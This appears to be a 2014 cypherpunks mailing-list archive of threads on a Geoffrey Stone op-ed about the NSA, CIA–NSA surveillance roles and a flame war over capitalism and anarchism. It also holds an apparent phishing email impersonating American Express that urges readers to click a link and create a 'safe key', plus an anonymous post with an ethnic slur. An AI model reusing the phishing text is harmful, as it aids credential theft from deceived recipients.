>> of the nation, necessarily poses grave dangers to fundamental
>> American values, particularly if its work is abused by persons
>> in positions of authority. If anything, oversight of the NSA
>> -- especially by Congress -- should be strengthened. The future
>> of our nation depends not only on the NSA doing its job, but
>> also on the existence of clear, definitive, and carefully
>> enforced rules and restrictions governing its activities.
>>
>> In short, I found, to my surprise, that the NSA deserves the
>> respect and appreciation of the American people. But it should
>> never, ever, be trusted.
--
Cari Machet

From carimachet at gmail.com Thu Apr 3 07:34:20 2014
From: carimachet at gmail.com (Cari Machet)
Date: Thu, 3 Apr 2014 14:34:20 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <1510450.mnmU7lygH4@lap>
References: <20140403025616.D514A2280D8@palinka.tinho.net> <533CEA12.4020904@riseup.net> <1510450.mnmU7lygH4@lap>
Message-ID:

On Thu, Apr 3, 2014 at 9:36 AM, rysiek wrote:

> On Wednesday, 2 April 2014 23:56:50 Douglas Lucas wrote:
> > From the looks of this speech, the NSA must have blackmailed him.
>
> Indeed. Regardless, however, some part of this diagnosis is spot-on: NSA
> should *not* have these authorities in the first place.
>
> I'm fine with Executive, Congress, FISA getting flak for these.
>
> And I'm quite certain that NSA has no way of white-washing themselves now.

good sir you have no idea of the midwest thought control machine at work in the good ole u$ of aahhh

white washing?
HA those good ole rotten souled boys also down in texass never get any tax breaks or ask for special privileges r nothin

and the nsa those poor souls they have no toys to play with and they are so humble they never asked for any toys either or nothing they dont even have any spoons to eat food with cause they are humble and good they keep their mouths shut and just sit quietly never moving and they dont want any money either cause they are jesuit priests ya know that never even heard the word sadomasochism let alone utter it or live it

> --
> Regards
> rysiek

--
Cari Machet

From alfiej at fastmail.fm Wed Apr 2 20:39:58 2014
From: alfiej at fastmail.fm (Alfie John)
Date: Thu, 03 Apr 2014 14:39:58 +1100
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net>
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID: <1396496398.9121.102160329.353BA3A5@webmail.messagingengine.com>

On Thu, Apr 3, 2014, at 01:56 PM, dan at geer.org wrote:
> www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology
>
> I came away from my work on the Review Group with a view of
> the NSA that I found quite surprising.
> Not only did I find
> that the NSA had helped to thwart numerous terrorist plots
> against the United States and its allies in the years since
> 9/11, but I also found that it is an organization that operates
> with a high degree of integrity and a deep commitment to the
> rule of law.

You can probably stop with the NSA apologists' propaganda, April Fools was yesterday.

Alfie

--
Alfie John
alfiej at fastmail.fm

From cypher at cpunk.us Thu Apr 3 13:00:29 2014
From: cypher at cpunk.us (Cypher)
Date: Thu, 03 Apr 2014 15:00:29 -0500
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307>
Message-ID: <533DBDDD.8050102@cpunk.us>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/03/2014 02:48 PM, Cari Machet wrote:
> On Thu, Apr 3, 2014 at 3:34 PM, wrote:
>
>> Message of 03/04/14 16:54 From: "Cari Machet"
>>
>>> Not that journalists should be expected to make a lasting
>>> difference.
>>
>> WTF?
>>
>> this shit was posted on huffington post probably for those
>> without ad blocker there was ad with bewbs on it next to the
>> text
>>
>> one more thing why do you assume to know the minds of the people
>> that own the snowden data - they are capitalists - that is all
>
> Do capitalists upset you?
>
> CAPITALISTS have no concept of reality and are completely self
> serving yes that is upsetting to my sensibilities and
> consciousness

Which is *precisely* why I would rather trust information provided to me by a capitalist than that provided to me by an idealist. A capitalist sees everything as a product that will either further his desire for success or hinder it. An idealist sees everything as a mission fitting within their narrow agenda. A capitalist has much more incentive to provide a good product (correct, accurate, information) than an idealist whose sole goal is to further an agenda.
Both have their uses though and both can be manipulated to good and bad ends.

> the careerist journalists laura poitras et al are capitalistic in
> every way - exploitive

I disagree. The careerist journalists are "crony capitalists" in every way. They know that, regardless of the accuracy of their information, the 'other side of the coin' will smooth things over and keep the public hooked on an inferior product. That's not a true capitalist.

That's one of my main arguments with socialists and other non-capitalist believers: they point to our current system and say 'see, it's exploitive and hurts people!' and it does. But that's not a true capitalist system. Will we ever actually have one? Doubtful. But what we have now is definitely not a good example.

Cypher

-----BEGIN PGP SIGNATURE-----
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
-----END PGP SIGNATURE-----

From juan.g71 at gmail.com Thu Apr 3 12:22:11 2014
From: juan.g71 at gmail.com (Juan Garofalo)
Date: Thu, 03 Apr 2014 16:22:11 -0300
Subject: Geoff Stone, Obama's Review Group - Part 2
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID:

--On Thursday, April 03, 2014 8:09 AM -0400 John Young wrote:

> The CIA is the principal
> customer of NSA products outside
> the military. When global cyber spying Cybercom was proposed
> NSA did not want to do it, claiming it exceeded NSA's military
> mission.

That doesn't sound like something John Young would write. The idea that the US military, who are the ones really running the show, wouldn't want to increase their power is just...too exceedingly naive.

> However, the pols, and CIA, wanted that very excess,
> in particular for spying inside the US, ostensibly banned for the
> CIA but now needed for terrorists inside.
>
> CIA (long FBI opponents) thought FBI could not cope with inside
> terrorists, using 9/11 as an example, and advocated NSA involvement
> with its much greater technical capability, but more importantly, its
> military-privileged secrecy not susceptible to full congressional
> oversight, courts and FOIA.
>
> The joint CIA-NSA Special Collection Service (SCS) has
> been doing for decades what NSA is now alone accused of doing:
> CIA provided the targets, NSA did the technical collection from
> those global stations identified by xKeyscore (most in embassies
> or nearby).
>
> What is bizarre is how little CIA is mentioned in news furor about
> NSA, as if NSA did its work in isolation from the IC and without
> oversight of the 3 branches.
>
> SCS also does burglaries, code snatches, decrypts, doc drops,
> stings, ploys, blackmail, the panoply of CIA operations. The increased
> civilian target panoply bestowed upon NSA came from CIA demands
> channeled through ODNI.
>
> Reviewing what little has been released of the Snowden documents
> they are quite similar to what SCS has been doing with the addition
> of the US as target. FISA had to be rejiggered for the US domain.
>
> Most national leaders, like POTUS, are considered to be military
> commanders thus fair game for NSA along with CIA. Nothing
> exceptional about the recent revelations of spying on chiefs of
> state.
> NSA technical collection capability was developed for the
> military, not civilian use. Now expanded to CIA full dominance
> territory. FISA had to be rejiggered for using it against civilians.
> And is still being rejiggered these days.
>
> NSA's recent attempt to slough off Cybercom and return to
> its military mission, has been rejected by the civilian overseers
> following CIA guidance and fear-mongering of civilians, especially
> those inside the US. The last thing CIA and its supporters want
> is a revelation of its manipulation of civilian leaders institutionalized
> by the 1947 National Security Act (also opposed by the military).
>
> -----
>
> At 10:56 PM 4/2/2014, DG wrote on cypherpunks:
>
>> [ disclaimer, Geoff Stone is a friend of mine ]
>>
>> www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology
>>
>> What I Told the NSA
From cypher at cpunk.us Thu Apr 3 14:22:21 2014
From: cypher at cpunk.us (Cypher)
Date: Thu, 03 Apr 2014 16:22:21 -0500
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us>
Message-ID: <533DD10D.8090005@cpunk.us>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/03/2014 03:49 PM, Cari Machet wrote:
>> Do capitalists upset you?
>
>> CAPITALISTS have no concept of reality and are completely self
>> serving yes that is upsetting to my sensibilities and
>> consciousness
>
> Which is *precisely* why I would rather trust information provided to me
> by a capitalist than that provided to me by an idealist.
>
>> i am a fucking anarchist which by the words you use in your
>> writing that point to your low level concepts - you probably have
>> no clue about
>
>> you are a capitalist - making frames for others to fit your
>> fucking lame ass argument - pathetic

Actually, Cari, I've done a pretty extensive foray into Anarchism. It's an interesting but, IMHO, completely unworkable system populated by people who dream of a better, freer world, but have no chance of actually creating it - not now at least. What turned me off about Anarchism were people like you. People who waved their moral superiority flag every chance they got and assumed that anyone who supported a different view than theirs was ignorant or didn't understand what Anarchy is.
In a lot of cases, Anarchists are their own worst enemy.

> A capitalist sees everything as a product that will either further
> his desire for success or hinder it. An idealist sees everything as
> a mission fitting within their narrow agenda. A capitalist has much
> more incentive to provide a good product (correct, accurate,
> information) than an idealist whose sole goal is to further an
> agenda. Both have their uses though and both can be manipulated to
> good and bad ends.
>
>> an anarchist DOES NOT generally have one goal - capitalists think
>> that way anarchists are node based thinkers capitalist are
>> monolithic thinkers and often frame things in a dualistic or
>> black and white manner which is very christian religion in form
>> and thought pattern

Well, Cari, from what I've seen from the Anarchist community, the main goal that anarchists have is to abolish the state. This, of course, is a means to an end (the end being personal freedom) but the goal seems to be nearly single-minded focus on abolishing the state. And yes, I know some anarchists will say 'some of us simply ignore the state' and that's true. But, in reality, the main 'collective' goal (and I use that term loosely) is to abolish the state. To confirm this, just talk to any anarchist and ask them what the biggest problem to humanity is. Most will say 'the state'. How do you solve it? 'Work to abolish the state'. Seems pretty single minded to me.

But, please, instead of ranting and wild arm-waving, educate me if I am wrong. I would certainly /love/ to see a workable, large scale, anarchistic plan. I admit I probably don't know as much about the philosophy as you do. But, instead of just angrily cursing, why not try to educate me? I know that's a bit harder than angry arm-waving and cursing but it's probably more productive.
>> capitalism is an economic model that has severe ramifications
>> for society it is no different than having a monarch really there
>> is a degree of difference regarding poverty but ... i heard today
>> that if you are dying of cancer in uganda you have a 10% chance
>> of having access to morphine ... they give cancer patients
>> paracetamol ... thats your great capitalism i find it disgusting

Actually, that /isn't/ capitalism. Why do you think what you read is the case? Maybe it's because of deals cut between governments and corporations? Do you know what we call that intertwining? No, we don't call it capitalism. We call it /fascism/.

>> the careerist journalists laura poitras et al are capitalistic
>> in every way - exploitive
>
> I disagree. The careerist journalists are "crony capitalists" in
> every way.
>
>> listen i am an activist journalist making money / becoming famous
>> like them off of journalism in the way they do it is not ok with
>> me its not how i would ever in a million years do my work

And /that/ is one of the great things about capitalism: you can try different things. You don't have to be confined to one narrow model. You don't agree with it? Great! Go do something your way and nobody is likely to stop you (except the predatory crony capitalists, but I think we've established those aren't real capitalists, right?)

> They know that, regardless of the accuracy of their information,
> the 'other side of the coin' will smooth things over and keep the
> public hooked on an inferior product. That's not a true
> capitalist.
>
>> i think you're an idealist actually 'true capitalism' thats a
>> theory

Perhaps I am. Just like a Utopian anarchistic society is a theory that's never been proven. It's a different way of thinking, each with positives and negatives. I think we're probably /both/ idealists in our own ways.

> That's one of my main arguments with socialists and other
> non-capitalist believers:
>
>> BELIEVERS?????????
>> LMAO
>
>> i dont believe in belief that is religious

You don't believe in the power of your anarchistic philosophy? Hmm, perhaps that's the problem then! I assume, being a journalist, you understand that words have multiple meanings and we use them within 'contexts'. Using the word 'believe' in the context I did doesn't have religious connotations at all. But I bet you know that. It looks like you are upset and just lashing out at everything because we don't agree. That's alright. I've seen your posts here and know you're more intelligent than that. So, yes, you're a 'believer' or...at least...you should be.

> they point to our current system and say 'see, it's exploitive and
> hurts people!' and it does. But that's not a true capitalist
> system. Will we ever actually have one? Doubtful. But what we have
> now is definitely not a good example.
>
>> i dont think you understand that capitalism is well beyond an
>> economy - watch naomi klein

Oh I understand it very well. I suspect it's you, who's obviously stuck within a very narrow worldview, who may not understand it. I've read Ms. Klein and I like a lot of her work - I don't agree with all of it, but I like it. But you know as well as I do that she comes at the topic with a bias. Also, from what I've read, her main beef seems to be with globalization and the influence corporations have on governments and, thus, the people. Remember, we've already covered this: it's not capitalism but /fascism/ when you have that. Do you have anything in particular by Ms. Klein you'd like me to read that may help 'educate' me? I'd be happy to give it a go. So far, I've only read "No Logo", "The Take", and "The Shock Doctrine". Anything else I should pick up?

>> https://www.youtube.com/watch?v=Ka3Pb_StJn4

Yep, saw this video series. Brilliant woman, great book. Still talking largely about fascism and not capitalism. I mean, sure, she uses the /word/ 'capitalism' but that's not what she's describing. She's talking fascism.
>> with capitalism the iraq invasion happened within its frame
>
>> black sites torture sites around the globe were conducted within
>> the frame of capitalism
>
>> gitmo 'lives' inside the frame of capitalism

So, do you believe that the horrible things that happened in Iraq and GITMO wouldn't have happened if the corporations weren't involved? I agree that they probably wouldn't have happened on such a /massive/ scale simply because there would have been a manpower shortage but I suspect some of those 'true blue' soldiers wouldn't have had much of a problem picking up a chemical light and sticking it up someone's ass...or raping them. Were the naked pictures of prisoners at Abu Ghraib capitalism at work too? Oh, wait, those were soldiers, not businessmen trying to make money.

>> i dont think you understand anarchy or anarchistic thought
>> processes at all

I certainly admit that I don't understand it as much as /you/ do or many others who spend a good amount of their time researching and reading anarchistic thought. But I do have a good understanding of it. However, feel free to point me in the direction of some good educational material. I'll read it happily! I like exploring different thoughts. I actually /like/ the idea of anarchy, just like I like much of the ideas of socialism. But they both, IMHO, fall a bit off the mark. That might be an educational thing that can be fixed though so feel free to point me in the right direction. No sarcasm intended here, I am open to learning!
Cypher

-----BEGIN PGP SIGNATURE-----
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCgAGBQJTPdEAAAoJEFuutbL6JoJrTmkP/2sH2LYqKN620/tkbZOT0fjD
/JBsbumLknFOUL7ZpYcfa+Nh+2SOLTOFDX7GxuUckbHnkUtjAZgrXKcB+aoMYbMp
NOZrufIp4lcOZo7a/5DWRlU4gYRH0FtYxkpDP06lLxWDHFQ0vCujflrifGiMidPU
Ln4ATUy/wcT+OBDk+l3bWvoH3N9M2HQ9Ib/VaIcoyK6QOKLCKlMuKu+ft2PPK1nz
n9NPFyEFFkLzs7uJZh+s0UYPHAJSJbB0pd/IBQ3NA3U8DfJBbQmH9SWOmNTFTBdo
z8CFCem4smbUvyn208HQ1dyDArY400GnOx2Y20bADB+YO0g62CSmKEshPhPSRmDG
bI4LnyUICrJ0rRKU/FzQLCTEtWNeRGAY8JhbMgQVShpqfcWl4TTL745b+FEk04QO
Ikpnb2k+1zuGa+lDi4Xp9Lv0fxSW3W0j+w+t9o+u+0K/fOWkF7Gx/uB9G0/oynOb
/sFMsvaUOcx7a879bHa88rr4mH5L5puCjTOeAUBkyC39jxcTRFvLEw4Sai1Q9mEY
ZODFhA1BSgVJungKYLpqevIIyVlsKJW9LK8+ov8i2WDF2ygq1EqI+3iOwoKxFfmC
EO9XdHUYtGtPsQKqh5ldl7rGQWYxu3J+FatmVhwGKCEdVer+yP/f5gT1h4SjrHVp
x67TKKhVf3r2CYcZyZmw
=gX6E
-----END PGP SIGNATURE-----

From rysiek at hackerspace.pl Thu Apr 3 07:25:24 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 03 Apr 2014 16:25:24 +0200
Subject: Google can grow up to not be evil
In-Reply-To: <533D24D0.5080308@cathalgarvey.me>
References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> <533D24D0.5080308@cathalgarvey.me>
Message-ID: <6578247.InOOgvZAbe@lap>

On Thursday, 3 April 2014 10:07:28 Cathal Garvey wrote:
> Keep reading:
> "Fukushima is the result of, we believe, a nuke that blew up the reactor
> and another that set off the tsunami - the result of a war WITHIN the
> CIA. We believe many public ‘leaders’ are involved."
>
> ..I don't even

Well FINALLY! I was waiting for a decent conspiracy theory around Fukushima for years.

--
Regards,
rysiek

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From l at odewijk.nl Thu Apr 3 07:58:22 2014
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Thu, 3 Apr 2014 16:58:22 +0200
Subject: Google can grow up to not be evil
In-Reply-To: <6578247.InOOgvZAbe@lap>
References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> <533D24D0.5080308@cathalgarvey.me> <6578247.InOOgvZAbe@lap>
Message-ID:

2014-04-03 16:25 GMT+02:00 rysiek :
> On Thursday, 3 April 2014 10:07:28 Cathal Garvey wrote:
> > Keep reading:
> > "Fukushima is the result of, we believe, a nuke that blew up the reactor
> > and another that set off the tsunami - the result of a war WITHIN the
> > CIA. We believe many public ‘leaders’ are involved."
> >
> > ..I don't even
>
> Well FINALLY! I was waiting for a decent conspiracy theory around Fukushima
> for years.
>

Terribly weak nuke to leave the reactor /just/ intact enough to make it SEEM like an earthquake + tsunami, while IN FACT it WAS a nuke!

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 1059 bytes
Desc: not available
URL:

From pc at loom.cc Thu Apr 3 13:59:34 2014
From: pc at loom.cc (Patrick Chkoreff)
Date: Thu, 03 Apr 2014 16:59:34 -0400
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307>
Message-ID: <533DCBB6.8080902@loom.cc>

Cari Machet wrote, On 04/03/2014 03:48 PM:
> nobody 'owns' anything

Ownership is an exclusive right of use or disposal. If I wake up one morning and find you in my house eating my food, you-gonna be in big trouble Lucy.
From tpb-crypto at laposte.net Thu Apr 3 08:34:20 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Thu, 03 Apr 2014 17:34:20 +0200
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID: <740996795.264257.1396539260669.JavaMail.www@wwinf8307>

> Message of 03/04/14 16:54
> From: "Cari Machet"
>
> > Not that journalists should be expected
> > to make a lasting difference.
> >
> >
> WTF?
>
> this shit was posted on huffington post probably for those without ad
> blocker there was ad with bewbs on it next to the text
>
> one more thing why do you assume to know the minds of the people that own
> the snowden data - they are capitalists - that is all
>

Do capitalists upset you?

From carimachet at gmail.com Thu Apr 3 12:48:28 2014
From: carimachet at gmail.com (Cari Machet)
Date: Thu, 3 Apr 2014 19:48:28 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <740996795.264257.1396539260669.JavaMail.www@wwinf8307>
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307>
Message-ID:

On Thu, Apr 3, 2014 at 3:34 PM, wrote:
> > Message of 03/04/14 16:54
> > From: "Cari Machet"
> >
> > > Not that journalists should be expected
> > > to make a lasting difference.
> > >
> > >
> > WTF?
> >
> > this shit was posted on huffington post probably for those without ad
> > blocker there was ad with bewbs on it next to the text
> >
> > one more thing why do you assume to know the minds of the people that own
> > the snowden data - they are capitalists - that is all
> >
>
> Do capitalists upset you?
>

CAPITALISTS have no concept of reality and are completely self serving yes that is upsetting to my sensibilities and consciousness why do you frame things emotionally - i have thoughts you know umn logic?
the careerist journalists laura poitras et al are capitalistic in every way - exploitive serious fucking white ownership distortion fucked up shit

> nobody 'owns' anything

she fucking slapped a copyright on the end of her recording of snowden in hong kong and on mannings providence statement she put a cc with attribution - fuck off mannings words are not yours to slap your fucking name on

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2556 bytes
Desc: not available
URL:

From mixmaster at remailer.privacy.at Thu Apr 3 10:53:32 2014
From: mixmaster at remailer.privacy.at (Anonymous Remailer (austria))
Date: Thu, 3 Apr 2014 19:53:32 +0200 (CEST)
Subject: TROLL ALERT!!(cari machet our resident soft in the head fake indian leftist)
Message-ID:

Cari Machet is our resident soft in the head fake indian leftist who cant spell!!

DONT expect logic or rational thought from this entity..

anon

From carimachet at gmail.com Thu Apr 3 13:12:12 2014
From: carimachet at gmail.com (Cari Machet)
Date: Thu, 3 Apr 2014 20:12:12 +0000
Subject: Geoff Stone, Obama's Review Group - Part 2
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID:

On Thu, Apr 3, 2014 at 7:22 PM, Juan Garofalo wrote:
>
>
> --On Thursday, April 03, 2014 8:09 AM -0400 John Young
> wrote:
>
> > The CIA is the principal customer of NSA products outside
> > the military.
> > When global cyber spying Cybercom was proposed
> > NSA did not want to do it, claiming it exceeded NSA's military
> > mission.
>
>
> That doesn't sound like something John Young would write.
>
> The idea that the US military, who are the ones really running the
> show,
> wouldn't want to increase their power is just...too exceedingly naive.
>

yay to think the military would not want to expand its mandate when rummy fought so hard for them to get ahead of the cia ... competition is weird though it is possible - what are the thoughts on the cia as opposed to the military running the drone program in this regard ? the pentagon was gonna run it then it was decided no... the competition between different agencies in the us is bazzzarrio i cannot imagine how they deal with all the subcontractors - i am sure they figure out ways to be cruel to them

the thing is that there are different entities 'running the show' mostly its your good ole transnational corporations and fucking autocrats - basic mafia shit the junta aspect of the so called gov is just an arm of the transnationals... ever been to the strait of hormuz? to put the military beyond the transnationals is beyond naive its complete blindness

>
>
>
> > However, the pols, and CIA, wanted that very excess,
> > in particular for spying inside the US, ostensibly banned for the
> > CIA but now needed for terrorists inside.
> >
> > CIA (long FBI opponents) thought FBI could not cope with inside
> > terrorists, using 9/11 as an example, and advocated NSA involvement
> > with its much greater technical capability, but more importantly, its
> > military-privileged secrecy not susceptible to full congressional
> > oversight, courts and FOIA.
> >
> > The joint CIA-NSA Special Collection Service (SCS) has
> > been doing for decades what NSA is now alone accused of doing:
> > CIA provided the targets, NSA did the technical collection from
> > those global stations identified by xKeyscore (most in embassies
> > or nearby).
> >
> > What is bizarre is how little CIA is mentioned in news furor about
> > NSA, as if NSA did its work in isolation from the IC and without
> > oversight of the 3 branches.
> >
> > SCS also does burglaries, code snatches, decrypts, doc drops,
> > stings, ploys, blackmail, the panoply of CIA operations. The increased
> > civilian target panoply bestowed upon NSA came from CIA demands
> > channeled through ODNI.
> >
> > Reviewing what little has been released of the Snowden documents
> > they are quite similar to what SCS has been doing with the addition
> > of the US as target. FISA had to be rejiggered for the US domain.
> >
> > Most national leaders, like POTUS, are considered to be military
> > commanders thus fair game for NSA along with CIA. Nothing
> > exceptional about the recent revelations of spying on chiefs of
> > state.
> >
> > NSA technical collection capability was developed for the
> > military, not civilian use. Now expanded to CIA full dominance
> > territory. FISA had to be rejiggered for using it against civilians.
> > And is still being rejiggered these days.
> >
> > NSA's recent attempt to slough off Cybercom and return to
> > its military mission, has been rejected by the civilian overseers
> > following CIA guidance and fear-mongering of civilians, especially
> > those inside the US. The last thing CIA and its supporters want
> > is a revelation of its manipulation of civilian leaders institutionalized
> > by the 1947 National Security Act (also opposed by the military).
> >
> > -----
> >
> >
> > At 10:56 PM 4/2/2014, DG wrote on cypherpunks:
> >
> >> [ disclaimer, Geoff Stone is a friend of mine ]
> >>
> >>
> >> www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology
> >>
> >> What I Told the NSA
> >>
> >> Because of my service on the President's Review Group last fall,
> >> which made recommendations to the president about NSA surveillance
> >> and related issues, the NSA invited me to speak today to the NSA
> >> staff at the NSA headquarters in Fort Meade, Maryland, about my
> >> work on the Review Group and my perceptions of the NSA. Here,
> >> in brief, is what I told them:
> >>
> >> From the outset, I approached my responsibilities as a member
> >> of the Review Group with great skepticism about the NSA. I am
> >> a long-time civil libertarian, a member of the National Advisory
> >> Council of the ACLU, and a former Chair of the Board of the
> >> American Constitution Society. To say I was skeptical about
> >> the NSA is, in truth, an understatement.
> >>
> >> I came away from my work on the Review Group with a view of
> >> the NSA that I found quite surprising. Not only did I find
> >> that the NSA had helped to thwart numerous terrorist plots
> >> against the United States and its allies in the years since
> >> 9/11, but I also found that it is an organization that operates
> >> with a high degree of integrity and a deep commitment to the
> >> rule of law.
> >>
> >> Like any organization dealing with extremely complex issues,
> >> the NSA on occasion made mistakes in the implementation of its
> >> authorities, but it invariably reported those mistakes upon
> >> discovering them and worked conscientiously to correct its
> >> errors. The Review Group found no evidence that the NSA had
> >> knowingly or intentionally engaged in unlawful or unauthorized
> >> activity.
> >> To the contrary, it has put in place carefully-crafted
> >> internal procedures to ensure that it operates within the bounds
> >> of its lawful authority.
> >>
> >> This is not to say that the NSA should have had all of the
> >> authorities it was given. The Review Group found that many of
> >> the programs undertaken by the NSA were highly problematic and
> >> much in need of reform. But the responsibility for directing
> >> the NSA to carry out those programs rests not with the NSA,
> >> but with the Executive Branch, the Congress, and the Foreign
> >> Intelligence Surveillance Court, which authorized those programs
> >> -- sometimes without sufficient attention to the dangers they
> >> posed to privacy and civil liberties. The NSA did its job --
> >> it implemented the authorities it was given.
> >>
> >> It gradually became apparent to me that in the months after
> >> Edward Snowden began releasing information about the government's
> >> foreign intelligence surveillance activities, the NSA was being
> >> severely -- and unfairly -- demonized by its critics. Rather
> >> than being a rogue agency that was running amok in disregard
> >> of the Constitution and laws of the United States, the NSA was
> >> doing its job. It pained me to realize that the hard-working,
> >> dedicated, patriotic employees of the NSA, who were often
> >> working for far less pay than they could have earned in the
> >> private sector because they were determined to help protect
> >> their nation from attack, were being castigated in the press
> >> for the serious mistakes made, not by them, but by Presidents,
> >> the Congress, and the courts.
> >>
> >> Of course, "I was only following orders" is not always an
> >> excuse. But in no instance was the NSA implementing a program
> >> that was so clearly illegal or unconstitutional that it would
> >> have been justified in refusing to perform the functions
> >> assigned to it by Congress, the President, and the Judiciary.
> >> Although the Review Group found that many of those programs
> >> need serious re-examination and reform, none of them was so
> >> clearly unlawful that it would have been appropriate for the
> >> NSA to refuse to fulfill its responsibilities.
> >>
> >> Moreover, to the NSA's credit, it was always willing to engage
> >> the Review Group in serious and candid discussions about the
> >> merits of its programs, their deficiencies, and the ways in
> >> which those programs could be improved. Unlike some other
> >> entities in the intelligence community and in Congress, the
> >> leaders of the NSA were not reflexively defensive, but were
> >> forthright, engaged, and open to often sharp questions about
> >> the nature and implementation of its programs.
> >>
> >> To be clear, I am not saying that citizens should trust the
> >> NSA. They should not. Distrust is essential to effective
> >> democratic governance. The NSA should be subject to constant
> >> and rigorous review, oversight, scrutiny, and checks and
> >> balances. The work it does, however important to the safety
> >> of the nation, necessarily poses grave dangers to fundamental
> >> American values, particularly if its work is abused by persons
> >> in positions of authority. If anything, oversight of the NSA
> >> -- especially by Congress -- should be strengthened. The future
> >> of our nation depends not only on the NSA doing its job, but
> >> also on the existence of clear, definitive, and carefully
> >> enforced rules and restrictions governing its activities.
> >>
> >> In short, I found, to my surprise, that the NSA deserves the
> >> respect and appreciation of the American people. But it should
> >> never, ever, be trusted.
> >
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 12612 bytes
Desc: not available
URL:

From AmericanExpress at welcome.aexp.com Thu Apr 3 09:52:06 2014
From: AmericanExpress at welcome.aexp.com (American Express Customer Service)
Date: Thu, 3 Apr 2014 20:22:06 +0330
Subject: American Express - Safe Key
Message-ID: <7NHJIRJOMO7Z4P1ZF3N4SZ847RCRYC@aexp.com>

Safe Key
Create your safe key now

Please create your Personal Security Key. Personal Safe Key (PSK) is one of several authentication measures we utilize to ensure we are conducting business with you, and only you, when you contact us for assistance.

American Express uses 128-bit Secure Sockets Layer (SSL) technology. This means that when you are on our secured website the data transferred between American Express and you is encrypted and cannot be viewed by any other party.

The security of your personal information is of the utmost importance to American Express, please click here to create your PSK (Personal Safe Key).

Note: You will be redirected to a secure encrypted website.

The contained message may be privileged, confidential and protected from disclosure.
If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.

Sincerely,
American Express Customer Service

Contact Customer Service | View Our Privacy Statement | Add Us to Your Address Book

This is a customer service e-mail from American Express. Using the spam/junk mail function may not block servicing messages from being sent to your email account. To learn more about e-mail security or report a suspicious e-mail, please visit us at americanexpress.com/phishing. We kindly ask you not to reply to this e-mail but instead contact us securely via customer service.

American Express. All rights reserved.
DTWEUSDP3709309

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 7488 bytes
Desc: not available
URL:

From rysiek at hackerspace.pl Thu Apr 3 11:31:46 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 03 Apr 2014 20:31:46 +0200
Subject: TROLL ALERT!!(cari machet our resident soft in the head fake indian leftist)
In-Reply-To:
References:
Message-ID: <1575193.mOTzX8i2Ad@lap>

On Thursday, 3 April 2014 19:53:32 Anonymous Remailer wrote:
> Cari Machet is our resident soft in the head fake indian leftist who cant
> spell!!
>
> DONT expect logic or rational thought from this entity..

http://1.bp.blogspot.com/-Rc8k_D3yYoE/Tw4IyOKMysI/AAAAAAAAAls/awgasVzJMfA/s320/Stephen-Colbert-Popcorn.gif

--
Regards,
rysiek

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From carimachet at gmail.com Thu Apr 3 13:49:40 2014
From: carimachet at gmail.com (Cari Machet)
